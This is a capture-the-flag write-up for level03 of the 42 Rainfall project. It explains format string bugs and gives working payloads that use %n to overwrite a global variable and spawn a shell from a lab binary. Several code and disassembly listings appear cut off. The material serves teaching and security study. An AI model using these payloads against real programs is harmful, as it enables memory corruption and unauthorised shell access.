Welcome to RainFall
Level03 of Rainfall Project
Introduction
Hello, today I'm going to walk you through my write-up of level03 of the Rainfall project from 42 school.
What is a "Format String" Vulnerability?
A format string vulnerability is a bug where user input is passed as the format argument to `printf`, `scanf`, or another function in that family, also called variadic functions.
The format argument supports many different specifiers, which can allow an attacker to leak data or write to memory if they control the format argument.
Today the vulnerability is demonstrated with `printf`, but it is possible with any variadic formatting function.
Because `printf` and similar functions are variadic, they keep fetching arguments from the stack according to the format string, whether or not the caller actually supplied them.
For example, if we can make the format argument "%x.%x.%x.%x", `printf` will read four stack values and print them in hexadecimal, potentially leaking sensitive information.
`printf` can also index an arbitrary "argument" with the following syntax:
- `%n$x` (where n is the decimal index of the argument you want)
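To make the argument-fetching behaviour concrete, here is a minimal Python sketch of a toy formatter. It is only a model, not how libc implements `printf`: the name `toy_printf` and the stack values are made up for illustration, and it only understands `%x` and `%N$x`.

```python
import re

# Matches "%x" or the positional form "%N$x".
SPEC_RE = re.compile(r"%(?:(\d+)\$)?x")

# Made-up stack words standing in for whatever sits above the format pointer.
FAKE_STACK = [0x11111111, 0x22222222, 0x33333333, 0x44444444]


def toy_printf(fmt, stack):
    """Expand %x and %N$x by reading 'arguments' from a list of stack words."""
    next_arg = 0

    def expand(match):
        nonlocal next_arg
        if match.group(1) is not None:
            index = int(match.group(1)) - 1  # %N$x is 1-based
        else:
            index = next_arg  # plain %x consumes the next argument
            next_arg += 1
        return format(stack[index], "x")

    return SPEC_RE.sub(expand, fmt)


print(toy_printf("%x.%x.%x.%x", FAKE_STACK))  # 11111111.22222222.33333333.44444444
print(toy_printf("%2$x %2$x", FAKE_STACK))    # 22222222 22222222
```

The formatter never checks how many arguments the caller really passed, which is exactly why an attacker-controlled format can walk up the stack.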
While these bugs are powerful, they're rare nowadays, as most modern compilers can warn when `printf` is called with a non-constant format string.
So, to get back to the point: a format string vulnerability lets us read from and (as we'll see later) write to the stack or to a specific location in memory.
How to detect a format string vulnerability?
I'm going to suggest two methods for identifying a "Format String Vulnerability".
If we open the binary in objdump, r2, or Ghidra, at some point we should see a call to `printf`, `scanf`, or another variadic formatting function whose format argument is not a constant string but is controlled by user input.
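When source code or decompiled pseudo code is available, the same check can be roughly automated. The sketch below is a heuristic of my own, not a real analysis tool: it flags `printf`-family calls whose format argument does not start with a string literal. The function name `suspicious_calls` and the sample snippet are assumptions for illustration.

```python
import re

# Position of the format argument for a few printf-family functions.
FORMAT_ARG_INDEX = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2}
CALL_RE = re.compile(r"\b(printf|fprintf|sprintf|snprintf)\s*\(([^;]*)\)\s*;")


def suspicious_calls(c_source):
    """Return (line number, call text) for calls with a non-literal format."""
    findings = []
    for lineno, line in enumerate(c_source.splitlines(), start=1):
        for match in CALL_RE.finditer(line):
            name, raw_args = match.group(1), match.group(2)
            # Naive comma split: good enough to look at the format position.
            args = [arg.strip() for arg in raw_args.split(",")]
            index = FORMAT_ARG_INDEX[name]
            if index < len(args) and not args[index].startswith('"'):
                findings.append((lineno, match.group(0)))
    return findings


SAMPLE = """
fgets(buf, sizeof(buf), stdin);
printf(buf);
printf("%s", buf);
"""

print(suspicious_calls(SAMPLE))  # [(3, 'printf(buf);')]
```

A hit only means "look closer": the variable may still be a constant, and a regex will miss calls split across lines.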
Searching for the vulnerability
If we disassemble the binary with objdump, we see two interesting functions: `v` and `main`.
The objdump output should look like this:
080484a4 <v>:
The `main` function calls `v`, and if we look a little more closely at `v` we can see this:
080484a4 <v>:
Of course, in 32-bit x86, arguments are passed on the stack. Remember that the first argument of `printf` should always be a constant string that represents the format.
The problem here is that the previous call is `fgets`, which reads the user's input from stdin and writes it into the buffer allocated on the stack. I describe each instruction in the following section.
Explanation of the problem
Look at this piece of code:
080484a4 <v>:
`push ebp` and `mov ebp, esp` create the stack frame; this is the prologue of the function `v`.
The instruction `sub esp, 0x218` allocates space on the stack. Remember that the stack is LIFO (last in, first out) and grows downward, so here we reserve 536 bytes (`0x218` in hexadecimal).
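As a quick sanity check of that arithmetic, the sketch below converts the frame size and models the `sub esp, 0x218` step. The starting `esp` value is hypothetical and chosen only to show the direction of growth.

```python
FRAME_SIZE = 0x218  # operand of `sub esp, 0x218`


def reserve(esp, size):
    """Model `sub esp, size` on a 32-bit stack that grows downward."""
    return (esp - size) & 0xFFFFFFFF


esp_before = 0xBFFFF700  # hypothetical stack pointer before the allocation
esp_after = reserve(esp_before, FRAME_SIZE)

print(FRAME_SIZE)      # 536
print(hex(esp_after))  # 0xbffff4e8
```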
Next comes the instruction `mov eax, ds:0x8049860`. `0x8049860` is a fixed address accessed through the data segment (`ds`), and if we examine it in gdb we can see that it holds stdin, so from now on we know this address is stdin.
The following instructions set up the parameters of `fgets`. Remember that arguments are placed in reverse order, so the value at `esp+0x8` is the third argument, the value at `esp+0x4` is the second argument, and the value at `esp` (the stack pointer, i.e. the top of the stack) is the first argument.
If we run `man fgets`, the prototype of the function is `char *fgets(char s[restrict .size], int size, FILE *restrict stream);`
So the parameters correspond perfectly.
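The mapping between stack slots and parameters can be sketched as follows. This assumes 4-byte slots as in the 32-bit calling convention described above; the helper name `stack_slots` is made up, and the parameter names come from the `fgets` prototype.

```python
WORD = 4  # size of one stack slot on 32-bit x86

# Parameter names in prototype order: fgets(s, size, stream).
FGETS_PARAMS = ["s", "size", "stream"]


def stack_slots(params, word=WORD):
    """Map each parameter to its offset from esp just before the call."""
    return {f"esp+{hex(i * word)}": name for i, name in enumerate(params)}


for slot, name in stack_slots(FGETS_PARAMS).items():
    print(slot, "->", name)
# esp+0x0 -> s
# esp+0x4 -> size
# esp+0x8 -> stream
```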
After the call, `fgets` returns the buffer address in the `eax` register, and as you can see that buffer is then placed on top of the stack and passed directly to `printf`.
So you can see that this piece of code is vulnerable to a format string attack: user input is passed directly as the first argument to `printf`, which means the user controls the format string. Let's run the program, enter `%x` four times, and see what happens:
❯ ./level3
Cool, we can now read from the stack!
Pseudo code of the v function
For simplicity's sake, you can also decompile the binary with Ghidra, IDA Pro, or Binary Ninja and look at the pseudo code.
void v(void)
As I said above, you can see that `printf` is called directly with the buffer that holds the user input.
We can also choose which value on the stack we want to display, like this for example:
- %2$x
This takes the second argument of `printf` and displays it in hexadecimal.
❯ ./level3
As we can see, the values are the same because we asked `printf` to display the same argument 4 times.
All right, that's cool: we can read values from the stack, and if a value is the address of a string we can replace `%x` with `%s` to read that string.
Great, but how can we write back to the stack, to a variable, or somewhere else in the program's memory?
We need `%n`, which writes the number of characters `printf` has output so far to the address given by the corresponding argument.
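The behaviour of `%n` can be modelled in a few lines of Python. This is a toy model under my own assumptions, not libc's implementation: memory is a plain dictionary, the target address `0x1000` is hypothetical, and only `%n` and `%N$n` are handled.

```python
import re

# Matches "%n" or the positional form "%N$n".
SPEC_RE = re.compile(r"%(?:(\d+)\$)?n")


def toy_printf_n(fmt, args, memory):
    """Copy text to the output; on %n / %N$n store the count written so far."""
    out = []
    written = 0
    next_arg = 0
    pos = 0
    for match in SPEC_RE.finditer(fmt):
        literal = fmt[pos:match.start()]
        out.append(literal)
        written += len(literal)
        if match.group(1) is not None:
            index = int(match.group(1)) - 1  # %N$n is 1-based
        else:
            index = next_arg
            next_arg += 1
        memory[args[index]] = written  # the argument is used as a pointer
        pos = match.end()
    out.append(fmt[pos:])
    return "".join(out)


memory = {}
TARGET = 0x1000  # hypothetical address
text = toy_printf_n("hello%n world", [TARGET], memory)
print(text)    # hello world
print(memory)  # {4096: 5}
```

Nothing is printed for `%n` itself; its only effect is the store, which is what turns a read primitive into a write primitive.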
We're going to test this with the level3 program. If we look at it a little more closely, we see a symbol named `m` in the `.bss` section.
Remember that `.bss` is an ELF section that holds uninitialised data.
`m` is a global variable, which we can also see with objdump:
$ objdump -t ./level3 | grep "m"
You should get the following output:
./level3:     file format elf32-i386
So `m` is at address `0x0804988c` and resides in the `.bss` section.
If we go back to our decompiled `v` function from above, it looks like this:
void v(void)
You can see that `m` must be equal to `0x40`, which is 64 in decimal.
Writing our exploit: how do we write to the m variable?
- Put the address of `m` on the stack.
- Write the value `0x40` (64 in decimal) at the address of `m` (`0x0804988c`) with `%n`.
- Trigger the condition `m == 0x40`, which executes `system("/bin/sh")`.
We'll need to put the address of `m` on the stack, then select it by argument index and write through it with `%n`, but first we need to determine where our buffer begins.
First, determine where our buffer is
$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*4 + b' %p'*4)"
❯ python3 -c "import sys; sys.stdout.buffer.write(b'A'*4 + b' %p'*4)" | ./level3
As you can see, I wrote `A` four times at the start of the input. In hexadecimal this is 0x41414141, and it shows up as the fourth value printed, so we can determine that our buffer is at argument index 4.
❯ python3 -c "import sys; sys.stdout.buffer.write(b'A'*4 + b' %4\$p')" | ./level3
We can see that index 4 still holds the start of our input, so we now know which argument we can use to write.
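Looking for the marker by eye works, but the search is easy to script. The sketch below parses a line in the shape that the `AAAA %p %p %p %p` payload produces and returns the index of the marker. The sample line is illustrative only: its first three values are made up, and only the marker at index 4 comes from the text above.

```python
def find_marker_index(printf_output, marker=0x41414141):
    """Return the 1-based index of the %p field equal to marker, or None."""
    fields = printf_output.split()[1:]  # drop the leading "AAAA"
    for index, field in enumerate(fields, start=1):
        # glibc prints a null pointer as "(nil)", which is not a hex number.
        if field != "(nil)" and int(field, 16) == marker:
            return index
    return None


# Illustrative output: the first three values are made up.
SAMPLE = "AAAA 0x11111111 0x22222222 0x33333333 0x41414141"

print(find_marker_index(SAMPLE))  # 4
```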
Second, write the address of m
We're now going to put the address of `m` in place of our four "A"s. Of course, we're on a 32-bit x86 architecture, and this CPU stores multi-byte values in little-endian order.
So the address must be written in little-endian for the CPU to read it correctly.
`0x0804988c` in little-endian is the byte sequence `\x8c\x98\x04\x08`.
If we replace the four "A" bytes (`0x41`) with these bytes, `%4$p` gives us the correct address back:
❯ python3 -c "import sys; sys.stdout.buffer.write(b'\x8c\x98\x04\x08' + b' %4\$p')" | ./level3
Tricks to convert bytes to little-endian
from pwn import *
These methods all convert data to little-endian.
You can choose whichever method you prefer.
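If pwntools is not installed, the standard library does the same job. The sketch below shows two equivalent ways to pack the address of `m` as a 32-bit little-endian value; the variable names are my own.

```python
import struct

M_ADDR = 0x0804988C  # address of m

# "<I" means little-endian, unsigned 32-bit integer.
packed = struct.pack("<I", M_ADDR)

# int.to_bytes gives the same four bytes.
also_packed = M_ADDR.to_bytes(4, "little")

print(packed)                 # b'\x8c\x98\x04\x08'
print(packed == also_packed)  # True
```

This matches what pwntools' `p32` produces for the same value, so either approach can feed the payload.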
Third, write the data
So, this is the final part of the exploit: writing the data.
We've put our address on the stack, but now we need to write `0x40` (64 in decimal) at the location of `m`.
`m` is 4 bytes long, and an address on 32-bit x86 is also 4 bytes.
As a reminder, `%n` stores the number of characters printed by `printf` so far.
To get the value 64 into `m`, we must subtract the length of the address already printed at the start of the payload (4 bytes here): 64 - 4 = 60 in decimal, or `0x3c` in hexadecimal. That is the padding still needed to reach the right value, so we just have to print 60 more characters.
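The padding arithmetic can be checked with a small payload builder. This is a sketch using the values from the text (address `0x0804988c`, target value `0x40`, argument index 4); the function name `build_payload` is my own.

```python
import struct

M_ADDR = 0x0804988C  # address of m
TARGET_VALUE = 0x40  # value m must hold (64)
ARG_INDEX = 4        # argument index where our buffer starts


def build_payload(addr, value, arg_index):
    """Address, then enough padding that %n stores exactly `value`."""
    address = struct.pack("<I", addr)
    if value < len(address):
        raise ValueError("value is smaller than the bytes already printed")
    padding = b"A" * (value - len(address))  # 64 - 4 = 60 bytes
    return address + padding + f"%{arg_index}$n".encode()


payload = build_payload(M_ADDR, TARGET_VALUE, ARG_INDEX)
print(len(payload) - len(b"%4$n"))  # 64 characters are printed before %n
print(payload)
```

Everything before the `%4$n` specifier is printed literally, so the count stored into `m` is 4 address bytes plus 60 padding bytes.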
So the final payload should look like this:
❯ python3 -c "import sys; sys.stdout.buffer.write(b'\x8c\x98\x04\x08' + b'A'*60 + b'%4\$n')" | ./level3
As you can see, we succeeded in entering the condition, because the string "Wait what?!\n" is displayed on the screen.
void v(void)
But we didn't get our shell: it exits immediately because its stdin closes as soon as the payload ends. To keep the shell open, we can keep stdin attached with a command such as cat or tail.
So the final payload is:
❯ (python3 -c "import sys; sys.stdout.buffer.write(b'\x8c\x98\x04\x08' + b'A'*60 + b'%4\$n')"; /bin/cat) | ./level3
Congratulations
Tada!
We have our shell back and you can reach the flag ;)
You can also use the following exploit script with pwntools ;)
#!/usr/bin/python3